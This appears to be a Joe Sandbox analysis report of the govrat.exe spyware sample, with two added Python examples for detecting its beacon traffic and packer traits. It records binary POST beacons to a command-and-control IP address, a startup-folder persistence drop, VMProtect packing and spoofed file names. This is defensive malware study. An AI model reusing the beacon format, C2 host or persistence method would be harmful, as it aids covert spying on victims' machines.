Analysis Report

Overview

General Information

Joe Sandbox Version: 21.0.0
Analysis ID: 50649
Start time: 22:25:38
Joe Sandbox Product: Cloud
Start date: 19.03.2018
Overall analysis duration: 0h 14m 45s
Hypervisor based Inspection enabled: true
Report type: full
Sample file name: govrat.exe
Cookbook file name: default.jbs
Analysis system description: W7x64 Native with HVM (patch level Feb 2018, Office 2016, Java 1.8.0_161, Flash 28, Acrobat Reader DC 18, Internet Explorer 11, Chrome 64, Firefox 58)
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal56.evad.winEXE@5/2@0/1
HCA Information: Failed
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Adjusted system time to: 10/10/2017
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): mscorsvw.exe, WmiPrvSE.exe, sppsvc.exe, devmonsrv.exe, mediasrv.exe, jhi_service.exe, IntelMeFWService.exe, obexsrv.exe, LMS.exe, dllhost.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy | Score | Range | Reporting | Detection
Threshold | 56 | 0 - 100 | Report FP / FN | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Classification

Signature Overview



Networking:

Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected:
    POST /index.html HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/octet-stream
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
    Content-Length: 440
    Host: 192.243.101.124
Source: global traffic | HTTP traffic detected:
    POST /index.html HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/octet-stream
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
    Content-Length: 32
    Host: 192.243.101.124
Posts data to webserver
Source: unknown | HTTP traffic detected:
    POST /index.html HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/octet-stream
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
    Content-Length: 440
    Host: 192.243.101.124
Urls found in memory or binary data
Source: explorer.exe | String found in binary or memory: file:///C:/Users/user/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/ASC.exellQ
Source: explorer.exe | String found in binary or memory: file:///C:/Users/user/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/ASC.exewlP
Source: explorer.exe | String found in binary or memory: file:///C:/Users/user/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/ASC.exeznX
Source: govrat.exe | String found in binary or memory: http://%S
Source: govrat.exe | String found in binary or memory: http://192.243.101.124/index.html
Source: govrat.exe | String found in binary or memory: http://192.243.101.124/index.htmlZZ)
Source: govrat.exe | String found in binary or memory: http://192.243.101.124e:
Source: govrat.exe, ASC.exe.1.dr | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: govrat.exe, ASC.exe.1.dr | String found in binary or memory: http://t2.symcb.com0
Source: govrat.exe, ASC.exe.1.dr | String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: govrat.exe, ASC.exe.1.dr | String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: govrat.exe, ASC.exe.1.dr | String found in binary or memory: http://tl.symcd.com0&
Source: explorer.exe | String found in binary or memory: http://www.%s.comPA
Source: govrat.exe, ASC.exe.1.dr | String found in binary or memory: https://www.thawte.com/cps0/
Source: govrat.exe, ASC.exe.1.dr | String found in binary or memory: https://www.thawte.com/repository0W
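
The two POSTs above are the sample's beacon shape: a binary body sent to a bare IP address at a static-looking path, with a hard-coded Chrome 41 User-Agent and none of the Referer or Cookie headers a real browser page POST carries. The Python below is an added example, not part of the Joe Sandbox report, that parses a raw request and lists which of those traits it shows. The request text is constructed from the headers shown above; the rule names, the "stale Chrome" threshold and the benign comparison request are assumptions.

```python
"""Score raw HTTP requests against the beacon traits seen in this report.

Added example, not part of the Joe Sandbox report. SAMPLE_REQUEST is
constructed from the report's "HTTP traffic detected" headers; the
thresholds and rule names below are assumptions, not the sandbox's rules.
"""
import ipaddress
import re

# Constructed from the report's first POST (Content-Length 440).
SAMPLE_REQUEST = (
    "POST /index.html HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/41.0.2228.0 Safari/537.36\r\n"
    "Content-Length: 440\r\n"
    "Host: 192.243.101.124\r\n"
    "\r\n"
)

_UA_CHROME = re.compile(r"Chrome/(\d+)\.")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into request line and lower-cased headers.

    The body (if any) is ignored; only the head before the blank line is read.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def is_bare_ip(host: str) -> bool:
    """True when the Host header is an IP literal (optionally with :port)."""
    candidate = host.rsplit(":", 1)[0].strip("[]")
    try:
        ipaddress.ip_address(candidate)
        return True
    except ValueError:
        return False


def beacon_indicators(req: dict, oldest_ok_chrome: int = 60) -> list:
    """Return the reasons a request resembles the beacon in this report.

    Each heuristic is weak on its own; the report's traffic hits all five.
    oldest_ok_chrome is an assumed cut-off for a "stale" browser version.
    """
    h = req["headers"]
    reasons = []
    if req["method"] == "POST" and h.get("content-type") == "application/octet-stream":
        reasons.append("binary POST body")
    if is_bare_ip(h.get("host", "")):
        reasons.append("Host is an IP literal")
    m = _UA_CHROME.search(h.get("user-agent", ""))
    if m and int(m.group(1)) < oldest_ok_chrome:
        reasons.append(f"stale Chrome UA (major {m.group(1)})")
    if req["method"] == "POST" and req["path"].endswith(".html"):
        reasons.append("POST to a static-looking .html path")
    if "referer" not in h and "cookie" not in h:
        reasons.append("no Referer/Cookie")
    return reasons
```

Run `beacon_indicators(parse_request(SAMPLE_REQUEST))` to see all five reasons fire; a normal browser GET with a Referer and a current Chrome version returns an empty list, which is the point of scoring the combination rather than any single header.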

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\govrat.exe | File created: C:\Users\user\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ASC.exe

Data Obfuscation:

Sample is protected by VMProtect
Source: govrat.exe | Static PE information: Section: .vmp1 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ASC.exe.1.dr | Static PE information: Section: .vmp1 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Entry point lies outside standard sections
Source: initial sample | Static PE information: section where entry point is pointing to: .vmp1
PE file contains sections with non-standard names
Source: govrat.exe | Static PE information: section name: .vmp0
Source: govrat.exe | Static PE information: section name: .vmp1
Source: ASC.exe.1.dr | Static PE information: section name: .vmp0
Source: ASC.exe.1.dr | Static PE information: section name: .vmp1
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0098C272 push edi; ret, 1_2_00A13AA9
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009793A1 push edi; ret, 1_2_009793AD
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097B969 push edi; ret, 1_2_0097B96A
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00985056 push edi; ret, 1_2_009D5A71
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0098B0D1 push edi; ret, 1_2_009D404F
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00988D9E push edi; ret, 1_2_00988D9F
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097D79A push edi; ret, 1_2_00A168D4
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097D711 push edi; ret, 1_2_00A0B8EA
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009805CE push edi; ret, 1_2_009805E4
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009802DE push edi; ret, 1_2_009A0EEB
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00977DA3 push edi; ret, 1_2_009CDFD4
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009852AF push edi; ret, 1_2_009852B0
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009814F4 push edi; ret, 1_2_009DBD75
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097B278 push edi; ret, 1_2_009B9A2F
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009580A5 push ecx; ret, 1_2_009580B8
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0098B5E4 push edi; ret, 1_2_009BF3FE
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097A9B7 push edi; ret, 1_2_0097A9B8
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097AC17 push edi; ret, 1_2_009B4D65
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0098AE5D push edi; ret, 1_2_009DAA7F
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097E453 push edi; ret, 1_2_009BD6B9
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097FD03 push edi; ret, 1_2_0097FD04
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00978BE0 push edi; ret, 1_2_009B02B9
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00985D50 push edi; ret, 1_2_00985D6B
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00984432 push edi; ret, 1_2_009C3C86
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00979733 push edi; ret, 1_2_009AF6C2
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0098360A push edi; ret, 1_2_009F21C4
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0098C32A push edi; ret, 1_2_009F7EA7
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097808D push edi; ret, 1_2_009EA573
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097C3A0 push edi; ret, 1_2_0097C3A1
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0097A11B push edi; ret, 1_2_0097A11C
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00986FCD push edi; ret, 1_2_00986FCE
Binary may include packed or encrypted code
Source: initial sample | Static PE information: section name: .vmp1 entropy: 7.94598915032
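
The three static signals the report uses here are the section names (.vmp0/.vmp1), the entry point landing in .vmp1, and the 7.95 bits/byte entropy of that section. The Python below is an added example, not part of the Joe Sandbox report, that extracts the same three signals from a PE section table with nothing beyond the standard library. The input is a constructed toy PE32 built in `build_sample_pe()`; its layout, section flags, entry point and byte contents are assumptions for illustration and are not taken from govrat.exe or ASC.exe.

```python
"""Static triage for packer signals: section names, entry-point section, entropy.

Added example, not part of the Joe Sandbox report. Parses just enough of the
PE headers to reach the section table. build_sample_pe() is a constructed
toy image; nothing in it is taken from the analysed sample.
"""
import hashlib
import math
import struct
from collections import Counter

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Names a normal linker emits; anything else is treated as non-standard.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls", ".CRT"}
PACKER_PREFIXES = {".vmp": "VMProtect", "UPX": "UPX", ".themida": "Themida"}  # assumed list
HIGH_ENTROPY = 7.0  # bits/byte; compressed or encrypted data sits close to 8


def shannon_entropy(buf: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input)."""
    n = len(buf)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def parse_sections(data: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) from an on-disk PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file (no MZ header)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                                    # optional header follows COFF header
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # same offset for PE32 and PE32+
    table = opt + opt_size
    sections = []
    for i in range(nsections):
        name, vsize, va, rsize, raw, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, table + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "raw": raw, "rsize": rsize,
                         "chars": chars, "entropy": shannon_entropy(data[raw:raw + rsize])})
    return entry_rva, sections


def triage(data: bytes) -> dict:
    """Apply the report's three static checks (plus a W+X check) to every section."""
    entry_rva, sections = parse_sections(data)
    findings, entry_section = [], None
    for s in sections:
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rsize"]):
            entry_section = s["name"]
        for prefix, packer in PACKER_PREFIXES.items():
            if s["name"].startswith(prefix):
                findings.append(f"{s['name']}: {packer} section name")
        if s["name"] not in STANDARD_SECTIONS:
            findings.append(f"{s['name']}: non-standard section name")
        if s["entropy"] >= HIGH_ENTROPY:
            findings.append(f"{s['name']}: entropy {s['entropy']:.2f}")
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{s['name']}: writable and executable")
    if entry_section not in STANDARD_SECTIONS:
        findings.append(f"entry point 0x{entry_rva:X} lies in {entry_section!r}")
    return {"entry_section": entry_section, "sections": sections, "findings": findings}


def _deterministic_bytes(n: int, seed: bytes) -> bytes:
    """High-entropy filler from chained SHA-256, standing in for protected code."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


def build_sample_pe() -> bytes:
    """Constructed PE32: low-entropy .text plus .vmp0/.vmp1 with the entry point in .vmp1."""
    def section(name, vsize, va, rsize, raw, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, rsize, raw, 0, 0, 0, 0, chars)

    text = bytes(range(16)) * 32                       # 0x200 bytes, entropy exactly 4.0
    vmp0 = _deterministic_bytes(0x400, b"vmp0")
    vmp1 = _deterministic_bytes(0x400, b"vmp1")
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x80) + b"\0" * (0x80 - 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 224, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\0" * 14 + struct.pack("<I", 0x3000) + b"\0" * 204
    rx_code = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    table = (section(b".text", 0x200, 0x1000, 0x200, 0x200, rx_code)
             + section(b".vmp0", 0x400, 0x2000, 0x400, 0x400, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ)
             + section(b".vmp1", 0x400, 0x3000, 0x400, 0x800, rx_code | IMAGE_SCN_CNT_INITIALIZED_DATA))
    headers = dos + coff + optional + table
    return headers + b"\0" * (0x200 - len(headers)) + text + vmp0 + vmp1
```

`triage(open(path, "rb").read())["findings"]` works on a real file as well; the entropy threshold is the only tunable, and a value near 7.0 keeps ordinary compressed resources (.rsrc holding PNGs) from firing on every binary.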

Spreading:

Enumerates the file system
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\govrat.exe | File opened: C:\Users\user\AppData\Roaming
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00960762 GetProcAddress,GetProcAddress,FindFirstFileA,GetProcAddress
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012D0762 GetProcAddress,GetProcAddress,FindFirstFileA,GetProcAddress

System Summary:

Detected Hacking Team Remote Control System (RCS) spyware
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0095FE2E GetProcAddress,GetProcAddress,GetProcAddress,K32EnumDeviceDrivers,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,__wcsicoll
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Desktop\govrat.exe | Memory allocated: 772C0000 page execute and read and write
Source: C:\Users\user\Desktop\govrat.exe | Memory allocated: 771C0000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 772C0000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 771C0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Memory allocated: 772C0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Memory allocated: 771C0000 page execute and read and write
Detected potential crypto function
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009641C3
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00966000
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00956502
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0095FB7F
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0096A780
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0096AE5C
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00966EED
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0096A22F
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_0096BB94
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00969CDE
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_00967EA6
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_1_00AC01CE
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_1_00ABFE67
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012DBB94
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012D41C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012D7EA6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012DA780
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012D9CDE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012D6000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012C6502
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012CFB7F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012DA22F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012DAE5C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_2_012D6EED
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_1_014301CE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe | Code function: 5_1_0142FE67
PE file contains strange resources
Source: govrat.exe | Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: ASC.exe.1.dr | Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: govrat.exe | Binary or memory string: OriginalFilename: wow64.dll vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: wow64lg2.dll vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: wow64cpu.dll vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: Kernelbase vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: CSRSS.Exe.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: winsrv.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: WinInit.exe.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: WINLOGON.EXE.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: user32 vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: services.exe.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: lsasrv.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: svchost.exe.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: SETUPAPI.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: wshtcpip.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: wship6.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: wshqos.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: AUTHUI.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: tzres.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: sppsvc.exe.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: Input.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: TipTsf.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: SpTip.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: TableTextService.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: gpsvc.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: aero.msstyles.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: taskcomp.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: CRYPT32.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: spoolsv.exe.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: BFE.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: FirewallAPI.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: taskhost.exe.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: USERINIT.EXE.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: originalfilename vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: propsys.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: EXPLORER.EXE.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: MSCMS.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: (empty) vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: MsCtfMonitor.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: snmptrap.exe.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: lmhsvc.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: dwm.exe.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: dhcpcore.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: peerdistsh.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: NetLogon.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: sstpsvc.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: localspl.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: netmsg.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: SHELL32.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: FXSRESM.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: taskeng.exe.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: WsdMon.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: vsstrace.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: WLDAP32.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: netprofm.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: ThemeUI.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: ExplorerFrame.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: esrb.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: xpsrchvw.exe.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: stobject.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: rasdlg.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: AltTab.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: wscui.cpl.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: HCPROVIDERS.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: SearchIndexer.exe.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: PNIDUI.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: tquery.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: sidebar.EXE.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: MsMpRes.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: twext.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: mpr.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: schedsvc.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: FDResPub.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: FunDisc.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: rpcrt4.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: FDPrint.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: BASEBRD.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: imageres.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: WINMM.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: DocumentPerformanceEvents.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: WerConCpl.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: MSHTML.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: SHSVCS.DLL.MUI vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: taskmgr.exe.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: SndVolSSO.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: win32spl.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: inetpp.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: advapi32.dll.mui vs govrat.exe
Source: govrat.exe | Binary or memory string: OriginalFilename: provsvc.dll.mui vs govrat.exe
Classification label
Source: classification engine | Classification label: mal56.evad.winEXE@5/2@0/1
Contains functionality to check free disk space
Source: C:\Users\user\Desktop\govrat.exe | Code function: 1_2_009641C3 GetProcAddress,GetDiskFreeSpaceExW
